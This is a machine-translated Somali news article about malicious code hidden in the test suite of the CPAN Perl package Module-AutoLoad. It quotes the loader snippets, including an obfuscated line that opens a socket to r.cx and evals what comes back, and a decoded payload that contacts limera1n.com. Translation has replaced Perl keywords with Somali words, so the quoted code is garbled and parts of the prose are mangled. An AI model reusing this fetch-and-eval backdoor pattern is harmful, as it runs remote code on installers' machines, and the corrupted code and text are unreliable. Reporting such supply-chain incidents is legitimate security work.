ProHoster > Блог > wararka internetka > Nambar xaasidnimo ah ayaa laga helay xirmada Module-AutoLoad Perl

Nambar xaasidnimo ah ayaa laga helay xirmada Module-AutoLoad Perl

In xirmo Perl ah oo loo qaybiyey tusaha CPAN Module-AutoLoad, loogu talagalay in si toos ah loogu shubo cutubyada CPAN duullimaadka, la aqoonsaday code xaasidnimo. Galinta xaasidka ah waxay ahayd helay in code imtixaanka 05_rcx.t, kaas oo soo daabulay ilaa 2011.
Waxaa xusid mudan in su'aalo ku saabsan soo dejinta koodka su'aalaha ay ka dhasheen qulqulka xad dhaafka ah dib u 2016.

Dhaqdhaqaaqa xaasidnimada ah wuxuu hoos ugu dhacayaa isku dayga lagu soo dejiyo oo lagu fulinayo koodka server-ka qolo saddexaad (http://r.cx:1/) inta lagu guda jiro fulinta qolka tijaabada ee la bilaabay markii la rakibayo moduleka. Waxaa loo malaynayaa in koodka markii hore laga soo dejiyey server-ka dibadda uusan ahayn mid xaasidnimo ah, laakiin hadda codsiga waxaa loo wareejiyay bogga ww.limera1n.com, kaas oo bixiya qaybtiisa koodka fulinta.

Si aad u habayso soo dejinta faylka 05_rcx.t Codsiyada soo socda ayaa la isticmaalaa:

my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $ try = `$^X $prog`;

Koodhka la cayimay wuxuu keenaa in qoraalka la fuliyo ../contrib/RCX.pl, waxa ku jira kuwaas oo lagu soo koobay khadka:

isticmaal lib do{eval<$b>&&botstrap("RCX")if$b=cusub IO::Socket::INET 82.46.99.88.":1″};

Qoraalkan ayaa culeys badan wareersan isticmaalka adeegga perlobfuscator.com koodka ka soo jeeda martigeliyaha dibadda r.cx (codes characters 82.46.99.88 waxay u dhigantaa qoraalka "R.cX") oo ku fuliya qaybta eval.

$ perl -MIO:: Socket -e'$b= IO cusub:: Socket:: INET 82.46.99.88.":1″; daabac <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Ka dib marka la furo, waxyaabaha soo socda ayaa ugu dambeyntii la fuliyay: code:

daabac {$b= IO cusub :: Socket:: INET"ww.limera1n.com:80″}"GET /iJailBreak
"; soo noqoshada qiimaynta digniin $@halka$b;1

Xirmada dhibka leh ayaa hadda laga saaray kaydka Hakad (Perl Authors Upload Server), iyo xisaabta qoraaga cutubka waa la xannibay. Xaaladdan oo kale, moduleka ayaa weli ah la heli karo ku jira kaydka MetaCPAN oo si toos ah ayaa looga rakibi karaa MetaCPAN iyadoo la adeegsanayo adeegyada qaarkood sida cpanminus. Waa la xusayin xirmada aan si weyn loo qeybin.

Xiiso leh in laga hadlo ku xiran iyo qoraaga moduleka, oo beeniyay xogta in code xaasidnimo ah la geliyey ka dib markii la jabsaday boggiisa "r.cx" oo uu ku macneeyey inuu ku raaxaysanayo, oo uu isticmaalo perlobfuscator.com si uu wax u qariyo, laakiin si loo yareeyo xajmiga. ee koodhka iyo fududaynta koobiyeyntiisa iyada oo loo marayo sabuuradda. Doorashada magaca shaqada "botstrap" waxaa lagu sharaxay xaqiiqda ah in ereygan "u eg yahay bot oo uu ka gaaban yahay bootstrap." Qoraaga cutubka ayaa sidoo kale xaqiijiyay in wax-is-daba-marinta la aqoonsaday aysan sameynin ficillo xaasidnimo ah, laakiin kaliya waxay muujinayaan dejinta iyo fulinta koodka iyada oo loo marayo TCP.

Source: opennet.ru